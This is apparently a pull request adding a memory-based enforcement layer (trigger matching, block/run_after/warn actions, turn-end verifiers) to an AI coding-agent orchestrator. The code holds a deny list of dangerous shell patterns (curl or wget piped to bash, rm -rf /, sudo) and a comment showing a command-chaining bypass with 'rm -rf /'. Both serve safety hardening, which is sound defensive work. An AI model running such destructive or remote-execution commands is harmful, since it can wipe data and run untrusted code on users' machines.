### PR TITLE
feat(memory): add enforcement layer to memory system

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -361,6 +361,23 @@ learned from user skip decisions. When a user skips a finding for a generalizabl
 (project convention, intentional pattern), the AI appends a one-line guideline to this file.
 All 3 code-reviewer agents read this file before reviewing and suppress matching findings.
 
+**Layer 5 — Enforcement Rules** (`enforcement-rules.ts`): Code-enforced memory entries that the LLM cannot ignore.
+Memory entries gain optional fields: `trigger` (what activates the rule), `action` (block/run_after/warn),
+`verifier` (semantic condition checked at turn_end). Enforcement hooks:
+
+- `tool_result`: after a tool completes, checks triggers and executes actions (block, run_after, warn)
+- `turn_end`: checks semantic verifiers and forces retry via `sendMessage(triggerTurn: true)` on violations
+
+Trigger types: `bash_contains <str>`, `bash_regex <pattern>`, `tool_name <name>`, `file_modified <glob>`.
+Action types: `block` (prevent), `run_after` (execute command after), `warn` (append warning).
+Verifier format: `tool_called <tool> before <command>` (checks tool ordering within a turn).
+
+Entries are added via `memory_add` with optional `trigger`, `action`, `verifier` parameters.
+Stored in the same `memory-scores.json` — no separate storage system.
+
+**Memory injection position**: memories injected at **tail** of system prompt (after rules/instructions).
+Research proves tail position gets highest LLM attention (U-shaped attention curve).
+
 **Capacity Signal** (`situation-report.ts`): Header shows usage % (e.g. `[72% — 1,224/1,700 tokens]`), consolidation warning at >80%.
 
 **Preference Auto-Extraction** (`preference-extractor.ts`): Detects "I prefer…"/"always use…"/"never…" patterns, auto-adds to memory, reinforces on repetition.

--- a/AGENTS.md
+++ b/AGENTS.md
@@ -44,8 +44,9 @@ pi-config/
 │   │   ├── btw.ts                   # /btw command
 │   │   ├── cron.ts                   # /cron scheduled tasks (interval/time-based)
 │   │   ├── dreaming.ts              # Background memory consolidation (inspired by OpenClaw)
-│   │   ├── enforcement.ts           # Command enforcement (python/pip, git, security, dangerous)
+│   │   ├── enforcement.ts           # Command enforcement (python/pip, git, security, dangerous) + memory-based enforcement rules
 │   │   ├── enforcement-helpers.ts   # Pure helpers for dangerous-command enforcement (read-only detection, .pi/tmp/ path validation)
+│   │   ├── enforcement-rules.ts     # Enforcement rules engine — trigger matching + action execution for memory-based enforcement
 │   │   ├── extended-autocomplete.ts  # Slash command argument completions (agents, branches, PRs, tags)
 │   │   ├── github-autocomplete.ts   # GitHub issue # autocomplete provider
 │   │   ├── git-helpers.ts           # Git utility functions
@@ -337,7 +338,10 @@ cold topics auto-archived after 2× half-life without reinforcement.
 **Auto-Injection Pipeline** (`rules.ts`):
 
 - `before_agent_start`: injects situation report + vector-matched memories + session history (skips trivial messages like "ok", "thanks")
-- `turn_end`: file-change memory reminders (vector search on modified paths) + task-focus enforcement (no tool calls but active tasks → injects follow-up)
+- `tool_result`: memory-based enforcement (trigger matching → block/run_after/warn)
+- `turn_end`: file-change memory reminders (vector search on modified paths) + task-focus enforcement
+  (no tool calls but active tasks → injects follow-up) + semantic enforcement verifier checking
+  (retries turn on violations)
 - Retrieval telemetry logged to `.pi/data/memory-telemetry.jsonl`; Ground Truth instruction tells LLM to trust injected context
 
 **Layer 4 — Vector Embeddings** (`memory-embeddings.ts`): Model `Xenova/bge-small-en-v1.5` (384 dims, local ONNX).

--- a/README.md
+++ b/README.md
@@ -27,6 +27,7 @@ Single extension that provides:
 | **Pidash dashboard** | Live web dashboard — multi-session monitoring, browser messaging, model switching |
 | **Pidiff viewer** | Standalone diff viewer with review comments — branch diffs, file tree, inline comments |
 | **Dreaming** | Background memory consolidation — extracts memories from sessions, deduplicates, maintains topic-based memory |
+| **Memory enforcement** | Code-enforced memory entries — triggers on bash/tool/file events, actions: block, run_after, warn. LLM cannot ignore enforced rules |
 | **Upgrade changelog** | Shows release notes on session start after pi-config version upgrade |
 | **Task tracking** | Structured task lists for multi-step workflows — live widget, progress tracking, reminder nudges ([@tintinweb/pi-tasks](https://github.com/tintinweb/pi-tasks)) |
 | **Neovim integration** | Send changed files and review findings to nvim's quickfix list — only active when running inside nvim |

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -236,16 +236,8 @@ export function matchToolCall(
       }
     }
 
-    // Check bash_contains/bash_regex in subagent task text
-    // Subagents run git commit/push — the orchestrator sees the subagent
-    // tool_result but not the bash commands inside. Match against the
-    // task description to catch delegated commands.
-    if (toolName === "subagent" && input?.task) {
-      const bashHit = matchBashTrigger(rule.trigger, input.task);
-      if (bashHit) {
-        matches.push({ rule, matched: bashHit });
-      }
-    }
+    // Subagent matching is handled in the tool_result hook via structured
+    // tool call extraction from subagent messages (not task text matching).
   }
   return matches;
 }

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -10,10 +10,12 @@ import { execSync } from "node:child_process";
 import {
   loadScores,
   getActiveEntries,
+  entryHash,
   type ScoredEntry,
   type EnforcementTrigger,
   type EnforcementAction,
 } from "./memory-scoring.js";
+import { readAllTopicEntries } from "./memory-tree.js";
 
 // ── Types ──────────────────────────────────────────────────────────────────
 
@@ -45,16 +47,22 @@ export interface ActionResult {
  */
 export function loadEnforcedEntries(cwd: string): EnforcedEntry[] {
   const active = getActiveEntries(cwd);
+  // Build hash→text lookup from topic files
+  const topicEntries = readAllTopicEntries(cwd);
+  const hashToText = new Map<string, string>();
+  for (const te of topicEntries) {
+    const line = `- [${te.category}] ${te.text}`;
+    hashToText.set(entryHash(line), te.text);
+  }
+
   const result: EnforcedEntry[] = [];
 
   for (const { hash, entry } of active) {
     if (!entry.trigger || !entry.action) continue;
 
-    // Reconstruct the text from topic files for display
-    // (hash is derived from the canonical line "- [category] text")
     result.push({
       hash,
-      text: hash, // Will be resolved from topic files if needed
+      text: hashToText.get(hash) || hash,
       trigger: entry.trigger,
       action: entry.action,
       actionCommand: entry.actionCommand,

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -252,11 +252,8 @@ export function checkVerifiers(
       const trName = toolResults[i].toolName;
       const trInput = toolResults[i].input || {};
       if (trName === requiredTool && requiredIdx === -1) requiredIdx = i;
-      if (triggerIdx === -1 && rule.trigger) {
-        const triggerEntry = { ...rule, action: (rule as any).entry?.action || "warn" } as any;
-        const hit = matchToolCall([triggerEntry], trName, trInput);
-        if (hit.length > 0) triggerIdx = i;
-      }
+      // Match beforeCommand in bash commands — this is the triggering event
+      // that the verifier checks (e.g., "gh pr merge" in a bash call)
       if (triggerIdx === -1 && trName === "bash" && trInput?.command?.includes(beforeCommand)) {
         triggerIdx = i;
       }

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -236,6 +236,17 @@ export function executeAction(
   command: string,
   cwd: string,
 ): ActionResult {
+  // Optional allowlist — if PI_ENFORCEMENT_ALLOWED_COMMANDS is set,
+  // only permit commands matching an allowed prefix
+  const allowedEnv = process.env.PI_ENFORCEMENT_ALLOWED_COMMANDS;
+  if (allowedEnv) {
+    const allowlist = allowedEnv.split(":").map(s => s.trim()).filter(Boolean);
+    const permitted = allowlist.some(allowed => command === allowed || command.startsWith(allowed + " "));
+    if (!permitted) {
+      return { output: `Blocked: command not in PI_ENFORCEMENT_ALLOWED_COMMANDS allowlist`, success: false };
+    }
+  }
+
   // Safety: reject commands that match dangerous patterns
   const BLOCKED_PATTERNS = [
     /\bcurl\b.*\|\s*(?:bash|sh|zsh)\b/i,    // curl | bash

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -230,6 +230,47 @@ export function matchToolCall(
 }
 
 /**
+ * Check verifier rules against a turn's tool results.
+ * Returns list of violated verifier strings.
+ */
+export function checkVerifiers(
+  verifierEntries: VerifierEntry[],
+  toolResults: Array<{ toolName: string; input: Record<string, any> }>,
+): string[] {
+  const violations: string[] = [];
+
+  for (const rule of verifierEntries) {
+    const m = rule.verifier.match(/^tool_called (\S+) before (.+)$/);
+    if (!m) continue;
+
+    const requiredTool = m[1];
+    const beforeCommand = m[2];
+
+    let requiredIdx = -1;
+    let triggerIdx = -1;
+    for (let i = 0; i < toolResults.length; i++) {
+      const trName = toolResults[i].toolName;
+      const trInput = toolResults[i].input || {};
+      if (trName === requiredTool && requiredIdx === -1) requiredIdx = i;
+      if (triggerIdx === -1 && rule.trigger) {
+        const triggerEntry = { ...rule, action: (rule as any).entry?.action || "warn" } as any;
+        const hit = matchToolCall([triggerEntry], trName, trInput);
+        if (hit.length > 0) triggerIdx = i;
+      }
+      if (triggerIdx === -1 && trName === "bash" && trInput?.command?.includes(beforeCommand)) {
+        triggerIdx = i;
+      }
+    }
+
+    if (triggerIdx >= 0 && (requiredIdx < 0 || requiredIdx >= triggerIdx)) {
+      violations.push(rule.verifier);
+    }
+  }
+
+  return violations;
+}
+
+/**
  * Execute a run_after action command.
  */
 export function executeAction(

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -242,8 +242,9 @@ export function executeAction(
   if (allowedEnv) {
     const allowlist = allowedEnv.split(":").map(s => s.trim()).filter(Boolean);
     // Exact match only — no prefix matching to prevent shell chaining bypass
-    // (e.g., ".dev/deploy-all.sh && rm -rf /" must not match ".dev/deploy-all.sh")
-    const permitted = allowlist.some(allowed => command === allowed);
+    // Both sides trimmed to avoid whitespace mismatches from storage
+    const commandTrimmed = command.trim();
+    const permitted = allowlist.some(allowed => commandTrimmed === allowed);
     if (!permitted) {
       return { output: `Blocked: command not in PI_ENFORCEMENT_ALLOWED_COMMANDS allowlist`, success: false };
     }

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -237,7 +237,7 @@ export function executeAction(
   cwd: string,
 ): ActionResult {
   // Optional allowlist — if PI_ENFORCEMENT_ALLOWED_COMMANDS is set,
-  // only permit commands matching an allowed prefix
+  // only permit exact-match commands (colon-separated)
   const allowedEnv = process.env.PI_ENFORCEMENT_ALLOWED_COMMANDS;
   if (allowedEnv) {
     const allowlist = allowedEnv.split(":").map(s => s.trim()).filter(Boolean);

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -55,7 +55,12 @@ export interface ActionResult {
  * Reads from the existing memory-scores.json — no separate storage.
  */
 export function loadEnforcedEntries(cwd: string): EnforcedEntry[] {
-  const active = getActiveEntries(cwd);
+  // Load ALL entries with trigger+action, not just active/provisional.
+  // Enforced rules are code-checked — lifecycle decay should not disable them.
+  const scores = loadScores(cwd);
+  const all = Object.entries(scores.entries)
+    .filter(([, e]) => e.lifecycle !== "dropped" && e.userState !== "forgotten")
+    .map(([hash, entry]) => ({ hash, entry }));
   // Build hash→text lookup from topic files
   const topicEntries = readAllTopicEntries(cwd);
   const hashToText = new Map<string, string>();
@@ -66,7 +71,7 @@ export function loadEnforcedEntries(cwd: string): EnforcedEntry[] {
 
   const result: EnforcedEntry[] = [];
 
-  for (const { hash, entry } of active) {
+  for (const { hash, entry } of all) {
     if (!entry.trigger || !entry.action) continue;
 
     result.push({
@@ -89,7 +94,11 @@ export function loadEnforcedEntries(cwd: string): EnforcedEntry[] {
  * `trigger` and `action` (which loadEnforcedEntries demands).
  */
 export function loadVerifierEntries(cwd: string): VerifierEntry[] {
-  const active = getActiveEntries(cwd);
+  // Same as loadEnforcedEntries — enforced rules bypass lifecycle decay
+  const scores = loadScores(cwd);
+  const all = Object.entries(scores.entries)
+    .filter(([, e]) => e.lifecycle !== "dropped" && e.userState !== "forgotten")
+    .map(([hash, entry]) => ({ hash, entry }));
   const topicEntries = readAllTopicEntries(cwd);
   const hashToText = new Map<string, string>();
   for (const te of topicEntries) {
@@ -99,7 +108,7 @@ export function loadVerifierEntries(cwd: string): VerifierEntry[] {
 
   const result: VerifierEntry[] = [];
 
-  for (const { hash, entry } of active) {
+  for (const { hash, entry } of all) {
     if (!entry.verifier) continue;
 
     result.push({

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -29,6 +29,15 @@ export interface EnforcedEntry {
   entry: ScoredEntry;
 }
 
+/** Verifier-only entry — has a verifier but trigger/action are optional */
+export interface VerifierEntry {
+  hash: string;
+  text: string;
+  trigger?: EnforcementTrigger;
+  verifier: string;
+  entry: ScoredEntry;
+}
+
 export interface TriggerMatch {
   rule: EnforcedEntry;
   matched: string; // what part of the input matched
@@ -79,7 +88,7 @@ export function loadEnforcedEntries(cwd: string): EnforcedEntry[] {
  * Reads active entries with a `verifier` field directly, without requiring
  * `trigger` and `action` (which loadEnforcedEntries demands).
  */
-export function loadVerifierEntries(cwd: string): EnforcedEntry[] {
+export function loadVerifierEntries(cwd: string): VerifierEntry[] {
   const active = getActiveEntries(cwd);
   const topicEntries = readAllTopicEntries(cwd);
   const hashToText = new Map<string, string>();
@@ -88,7 +97,7 @@ export function loadVerifierEntries(cwd: string): EnforcedEntry[] {
     hashToText.set(entryHash(line), te.text);
   }
 
-  const result: EnforcedEntry[] = [];
+  const result: VerifierEntry[] = [];
 
   for (const { hash, entry } of active) {
     if (!entry.verifier) continue;
@@ -96,9 +105,7 @@ export function loadVerifierEntries(cwd: string): EnforcedEntry[] {
     result.push({
       hash,
       text: hashToText.get(hash) || hash,
-      trigger: entry.trigger || ("" as any),
-      action: entry.action || ("warn" as any),
-      actionCommand: entry.actionCommand,
+      trigger: entry.trigger,
       verifier: entry.verifier,
       entry,
     });

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -96,9 +96,12 @@ function matchBashTrigger(
   }
   if (trigger.startsWith("bash_regex ")) {
     const pattern = trigger.slice("bash_regex ".length);
+    // Guard against ReDoS: limit pattern length
+    if (pattern.length > 200) return null;
     try {
       const re = new RegExp(pattern);
-      const m = command.match(re);
+      // Use a bounded match — limit input to first 4000 chars
+      const m = command.slice(0, 4000).match(re);
       if (m) return m[0];
     } catch {
       // Invalid regex — skip
@@ -200,6 +203,19 @@ export function executeAction(
   command: string,
   cwd: string,
 ): ActionResult {
+  // Safety: reject commands that match dangerous patterns
+  const BLOCKED_PATTERNS = [
+    /\bcurl\b.*\|\s*(?:bash|sh|zsh)\b/i,    // curl | bash
+    /\bwget\b.*\|\s*(?:bash|sh|zsh)\b/i,    // wget | bash
+    /\brm\s+(-[rf]+\s+)*\//,                 // rm -rf /
+    /\bsudo\b/,                               // sudo
+    /\bchmod\s+[0-7]*7[0-7]*\b/,             // world-writable chmod
+  ];
+  for (const pattern of BLOCKED_PATTERNS) {
+    if (pattern.test(command)) {
+      return { output: `Blocked: enforcement command matches dangerous pattern: ${pattern}`, success: false };
+    }
+  }
   try {
     const output = execSync(command, {
       cwd,

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -76,9 +76,35 @@ export function loadEnforcedEntries(cwd: string): EnforcedEntry[] {
 
 /**
  * Load entries that have semantic verifiers (for turn_end checking).
+ * Reads active entries with a `verifier` field directly, without requiring
+ * `trigger` and `action` (which loadEnforcedEntries demands).
  */
 export function loadVerifierEntries(cwd: string): EnforcedEntry[] {
-  return loadEnforcedEntries(cwd).filter((e) => !!e.verifier);
+  const active = getActiveEntries(cwd);
+  const topicEntries = readAllTopicEntries(cwd);
+  const hashToText = new Map<string, string>();
+  for (const te of topicEntries) {
+    const line = `- [${te.category}] ${te.text}`;
+    hashToText.set(entryHash(line), te.text);
+  }
+
+  const result: EnforcedEntry[] = [];
+
+  for (const { hash, entry } of active) {
+    if (!entry.verifier) continue;
+
+    result.push({
+      hash,
+      text: hashToText.get(hash) || hash,
+      trigger: entry.trigger || ("" as any),
+      action: entry.action || ("warn" as any),
+      actionCommand: entry.actionCommand,
+      verifier: entry.verifier,
+      entry,
+    });
+  }
+
+  return result;
 }
 
 // ── Trigger Matching ───────────────────────────────────────────────────────

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -241,7 +241,9 @@ export function executeAction(
   const allowedEnv = process.env.PI_ENFORCEMENT_ALLOWED_COMMANDS;
   if (allowedEnv) {
     const allowlist = allowedEnv.split(":").map(s => s.trim()).filter(Boolean);
-    const permitted = allowlist.some(allowed => command === allowed || command.startsWith(allowed + " "));
+    // Exact match only — no prefix matching to prevent shell chaining bypass
+    // (e.g., ".dev/deploy-all.sh && rm -rf /" must not match ".dev/deploy-all.sh")
+    const permitted = allowlist.some(allowed => command === allowed);
     if (!permitted) {
       return { output: `Blocked: command not in PI_ENFORCEMENT_ALLOWED_COMMANDS allowlist`, success: false };
     }

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -1,0 +1,207 @@
+/**
+ * Enforcement rules engine — reads enforced memory entries and provides
+ * trigger matching + action execution for the tool_result hook.
+ *
+ * This module does NOT register hooks — it provides pure functions
+ * that enforcement.ts and rules.ts call from their existing hooks.
+ */
+
+import { execSync } from "node:child_process";
+import {
+  loadScores,
+  getActiveEntries,
+  type ScoredEntry,
+  type EnforcementTrigger,
+  type EnforcementAction,
+} from "./memory-scoring.js";
+
+// ── Types ──────────────────────────────────────────────────────────────────
+
+export interface EnforcedEntry {
+  hash: string;
+  text: string;
+  trigger: EnforcementTrigger;
+  action: EnforcementAction;
+  actionCommand?: string;
+  verifier?: string;
+  entry: ScoredEntry;
+}
+
+export interface TriggerMatch {
+  rule: EnforcedEntry;
+  matched: string; // what part of the input matched
+}
+
+export interface ActionResult {
+  output: string;
+  success: boolean;
+}
+
+// ── Loading ────────────────────────────────────────────────────────────────
+
+/**
+ * Load all active memory entries that have enforcement fields.
+ * Reads from the existing memory-scores.json — no separate storage.
+ */
+export function loadEnforcedEntries(cwd: string): EnforcedEntry[] {
+  const active = getActiveEntries(cwd);
+  const result: EnforcedEntry[] = [];
+
+  for (const { hash, entry } of active) {
+    if (!entry.trigger || !entry.action) continue;
+
+    // Reconstruct the text from topic files for display
+    // (hash is derived from the canonical line "- [category] text")
+    result.push({
+      hash,
+      text: hash, // Will be resolved from topic files if needed
+      trigger: entry.trigger,
+      action: entry.action,
+      actionCommand: entry.actionCommand,
+      verifier: entry.verifier,
+      entry,
+    });
+  }
+
+  return result;
+}
+
+/**
+ * Load entries that have semantic verifiers (for turn_end checking).
+ */
+export function loadVerifierEntries(cwd: string): EnforcedEntry[] {
+  return loadEnforcedEntries(cwd).filter((e) => !!e.verifier);
+}
+
+// ── Trigger Matching ───────────────────────────────────────────────────────
+
+/**
+ * Check if a bash command matches a trigger.
+ */
+function matchBashTrigger(
+  trigger: EnforcementTrigger,
+  command: string,
+): string | null {
+  if (trigger.startsWith("bash_contains ")) {
+    const needle = trigger.slice("bash_contains ".length);
+    if (command.includes(needle)) return needle;
+  }
+  if (trigger.startsWith("bash_regex ")) {
+    const pattern = trigger.slice("bash_regex ".length);
+    try {
+      const re = new RegExp(pattern);
+      const m = command.match(re);
+      if (m) return m[0];
+    } catch {
+      // Invalid regex — skip
+    }
+  }
+  return null;
+}
+
+/**
+ * Check if a tool name matches a trigger.
+ */
+function matchToolTrigger(
+  trigger: EnforcementTrigger,
+  toolName: string,
+): string | null {
+  if (trigger.startsWith("tool_name ")) {
+    const expected = trigger.slice("tool_name ".length);
+    if (toolName === expected) return toolName;
+  }
+  return null;
+}
+
+/**
+ * Check if a file path matches a trigger.
+ */
+function matchFileTrigger(
+  trigger: EnforcementTrigger,
+  filePath: string,
+): string | null {
+  if (trigger.startsWith("file_modified ")) {
+    const glob = trigger.slice("file_modified ".length);
+    // Simple glob: *.py matches .py extension, exact match otherwise
+    if (glob.startsWith("*.")) {
+      const ext = glob.slice(1); // ".py"
+      if (filePath.endsWith(ext)) return filePath;
+    } else if (filePath.includes(glob)) {
+      return filePath;
+    }
+  }
+  return null;
+}
+
+/**
+ * Find all enforced entries whose triggers match a bash command.
+ */
+export function matchBashCommand(
+  entries: EnforcedEntry[],
+  command: string,
+): TriggerMatch[] {
+  const matches: TriggerMatch[] = [];
+  for (const rule of entries) {
+    const hit = matchBashTrigger(rule.trigger, command);
+    if (hit) matches.push({ rule, matched: hit });
+  }
+  return matches;
+}
+
+/**
+ * Find all enforced entries whose triggers match a tool call.
+ */
+export function matchToolCall(
+  entries: EnforcedEntry[],
+  toolName: string,
+  input: Record<string, any>,
+): TriggerMatch[] {
+  const matches: TriggerMatch[] = [];
+  for (const rule of entries) {
+    // Check tool_name triggers
+    const toolHit = matchToolTrigger(rule.trigger, toolName);
+    if (toolHit) {
+      matches.push({ rule, matched: toolHit });
+      continue;
+    }
+
+    // Check bash_contains/bash_regex for bash tool
+    if (toolName === "bash" && input?.command) {
+      const bashHit = matchBashTrigger(rule.trigger, input.command);
+      if (bashHit) {
+        matches.push({ rule, matched: bashHit });
+        continue;
+      }
+    }
+
+    // Check file_modified for write/edit tools
+    if ((toolName === "write" || toolName === "edit") && input?.path) {
+      const fileHit = matchFileTrigger(rule.trigger, input.path);
+      if (fileHit) {
+        matches.push({ rule, matched: fileHit });
+      }
+    }
+  }
+  return matches;
+}
+
+/**
+ * Execute a run_after action command.
+ */
+export function executeAction(
+  command: string,
+  cwd: string,
+): ActionResult {
+  try {
+    const output = execSync(command, {
+      cwd,
+      timeout: 60_000,
+      encoding: "utf-8",
+      stdio: ["pipe", "pipe", "pipe"],
+    });
+    return { output: output.trim(), success: true };
+  } catch (e: any) {
+    const stderr = e.stderr || e.message || "Unknown error";
+    return { output: stderr.trim(), success: false };
+  }
+}

--- a/extensions/orchestrator/enforcement-rules.ts
+++ b/extensions/orchestrator/enforcement-rules.ts
@@ -223,6 +223,18 @@ export function matchToolCall(
       const fileHit = matchFileTrigger(rule.trigger, input.path);
       if (fileHit) {
         matches.push({ rule, matched: fileHit });
+        continue;
+      }
+    }
+
+    // Check bash_contains/bash_regex in subagent task text
+    // Subagents run git commit/push — the orchestrator sees the subagent
+    // tool_result but not the bash commands inside. Match against the
+    // task description to catch delegated commands.
+    if (toolName === "subagent" && input?.task) {
+      const bashHit = matchBashTrigger(rule.trigger, input.task);
+      if (bashHit) {
+        matches.push({ rule, matched: bashHit });
       }
     }
   }

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -1,10 +1,11 @@
 /**
  * Enforcement handler — blocks forbidden commands (python/pip, git protection,
- * remote script execution, memory writes, dangerous).
+ * remote script execution, memory writes, dangerous) + memory-based enforcement rules.
  */
 
 import type { ExtensionAPI } from "@earendil-works/pi-coding-agent";
 import { isToolCallEventType } from "@earendil-works/pi-coding-agent";
+import { loadEnforcedEntries, matchToolCall, executeAction } from "./enforcement-rules.js";
 import { existsSync, readFileSync, writeFileSync } from "node:fs";
 import * as path from "node:path";
 import { join } from "node:path";
@@ -487,6 +488,71 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
     }
 
     return undefined;
+  });
+
+  // ── Memory-based enforcement (tool_result hook) ───────────────────
+  // After a tool completes, check if any enforced memory entry's trigger
+  // matches. Executes block/run_after/warn actions.
+  pi.on("tool_result", async (event, ctx) => {
+    if (process.env.PI_SUBAGENT_CHILD === "1") return;
+
+    const toolName = (event as any).toolName as string;
+    const input = (event as any).input || {};
+
+    let entries: ReturnType<typeof loadEnforcedEntries>;
+    try {
+      entries = loadEnforcedEntries(ctx.cwd);
+    } catch {
+      return; // No enforcement if loading fails
+    }
+    if (entries.length === 0) return;
+
+    const matches = matchToolCall(entries, toolName, input);
+    if (matches.length === 0) return;
+
+    const currentContent = (event as any).content || [];
+    const appendMessages: Array<{ type: string; text: string }> = [];
+
+    for (const { rule } of matches) {
+      if (rule.action === "block") {
+        // Block: mark result as error with enforcement message
+        return {
+          content: [
+            ...currentContent,
+            { type: "text", text: `\n⛔ ENFORCEMENT [${rule.entry.class}]: ${rule.text}` },
+          ],
+          isError: true,
+        };
+      }
+
+      if (rule.action === "run_after" && rule.actionCommand && !(event as any).isError) {
+        const result = executeAction(rule.actionCommand, ctx.cwd);
+        if (result.success) {
+          appendMessages.push({
+            type: "text",
+            text: `\n✅ Auto-enforced: ${rule.actionCommand}\n${result.output}`,
+          });
+        } else {
+          appendMessages.push({
+            type: "text",
+            text: `\n❌ Enforcement failed: ${rule.actionCommand}\n${result.output}`,
+          });
+        }
+      }
+
+      if (rule.action === "warn") {
+        appendMessages.push({
+          type: "text",
+          text: `\n⚠️ ENFORCEMENT WARNING: ${rule.text}`,
+        });
+      }
+    }
+
+    if (appendMessages.length > 0) {
+      return {
+        content: [...currentContent, ...appendMessages],
+      };
+    }
   });
 }
 

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -533,7 +533,7 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
 
     // For subagent results, extract actual bash commands from the subagent's
     // tool call messages (structured data only — no prose text fallback).
-    if (toolName === "subagent" && matches.length === 0) {
+    if (toolName === "subagent") {
       const details = (event as any).details;
       const results = details?.results || [];
       const bashCommands: string[] = [];

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -109,6 +109,29 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
     const command = event.input.command;
     const cmdLower = command.trim().toLowerCase();
 
+    // Memory-based enforcement — block rules checked before execution
+    try {
+      const entries = loadEnforcedEntries(ctx.cwd);
+      const blockEntries = entries.filter(e => e.action === "block");
+      if (blockEntries.length > 0) {
+        const matches = matchToolCall(blockEntries, "bash", { command: command });
+        if (matches.length > 0) {
+          const rule = matches[0].rule;
+          return { block: true, reason: `⛔ ENFORCEMENT [${rule.entry.class}]: ${rule.text}` };
+        }
+        // Also check non-bash tool_name and file_modified triggers
+        if (!isToolCallEventType("bash", event)) {
+          const toolName = (event as any).toolName || "";
+          const input = (event as any).input || {};
+          const toolMatches = matchToolCall(blockEntries, toolName, input);
+          if (toolMatches.length > 0) {
+            const rule = toolMatches[0].rule;
+            return { block: true, reason: `⛔ ENFORCEMENT [${rule.entry.class}]: ${rule.text}` };
+          }
+        }
+      }
+    } catch { /* enforcement should never break normal flow */ }
+
     // Block repeated identical commands (polling-by-spam) — orchestrator only
     if (process.env.PI_SUBAGENT_CHILD !== "1") {
       ensureRepeatFile(ctx.cwd);
@@ -502,8 +525,9 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
     let entries: ReturnType<typeof loadEnforcedEntries>;
     try {
       entries = loadEnforcedEntries(ctx.cwd);
-    } catch {
-      return; // No enforcement if loading fails
+    } catch (e: any) {
+      console.debug("[enforcement] loadEnforcedEntries failed:", e?.message?.slice(0, 100));
+      return;
     }
     if (entries.length === 0) return;
 
@@ -515,14 +539,9 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
 
     for (const { rule } of matches) {
       if (rule.action === "block") {
-        // Block: mark result as error with enforcement message
-        return {
-          content: [
-            ...currentContent,
-            { type: "text", text: `\n⛔ ENFORCEMENT [${rule.entry.class}]: ${rule.text}` },
-          ],
-          isError: true,
-        };
+        // Block is handled in tool_call hook (before execution)
+        // tool_result only handles run_after and warn
+        continue;
       }
 
       if (rule.action === "run_after" && rule.actionCommand && !(event as any).isError) {

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -105,32 +105,28 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
   });
 
   pi.on("tool_call", async (event, ctx) => {
-    if (!isToolCallEventType("bash", event)) return undefined;
-    const command = event.input.command;
-    const cmdLower = command.trim().toLowerCase();
-
-    // Memory-based enforcement — block rules checked before execution
+    // Memory-based enforcement — block rules checked before execution (all tool types)
     try {
       const entries = loadEnforcedEntries(ctx.cwd);
       const blockEntries = entries.filter(e => e.action === "block");
       if (blockEntries.length > 0) {
-        const matches = matchToolCall(blockEntries, "bash", { command: command });
+        const toolName = isToolCallEventType("bash", event) ? "bash"
+          : isToolCallEventType("write", event) ? "write"
+          : isToolCallEventType("edit", event) ? "edit"
+          : isToolCallEventType("read", event) ? "read"
+          : (event as any).toolName || "";
+        const input = (event as any).input || {};
+        const matches = matchToolCall(blockEntries, toolName, input);
         if (matches.length > 0) {
           const rule = matches[0].rule;
           return { block: true, reason: `⛔ ENFORCEMENT [${rule.entry.class}]: ${rule.text}` };
         }
-        // Also check non-bash tool_name and file_modified triggers
-        if (!isToolCallEventType("bash", event)) {
-          const toolName = (event as any).toolName || "";
-          const input = (event as any).input || {};
-          const toolMatches = matchToolCall(blockEntries, toolName, input);
-          if (toolMatches.length > 0) {
-            const rule = toolMatches[0].rule;
-            return { block: true, reason: `⛔ ENFORCEMENT [${rule.entry.class}]: ${rule.text}` };
-          }
-        }
       }
     } catch { /* enforcement should never break normal flow */ }
+
+    if (!isToolCallEventType("bash", event)) return undefined;
+    const command = event.input.command;
+    const cmdLower = command.trim().toLowerCase();
 
     // Block repeated identical commands (polling-by-spam) — orchestrator only
     if (process.env.PI_SUBAGENT_CHILD !== "1") {

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -527,6 +527,8 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
     }
     if (entries.length === 0) return;
 
+
+
     let matches = matchToolCall(entries, toolName, input);
 
     // For subagent results, also check bash_contains triggers against the

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -565,16 +565,8 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
           }
         }
       }
-      // Fallback: match against result text if no structured commands found
-      if (matches.length === 0) {
-        const resultText = ((event as any).content || [])
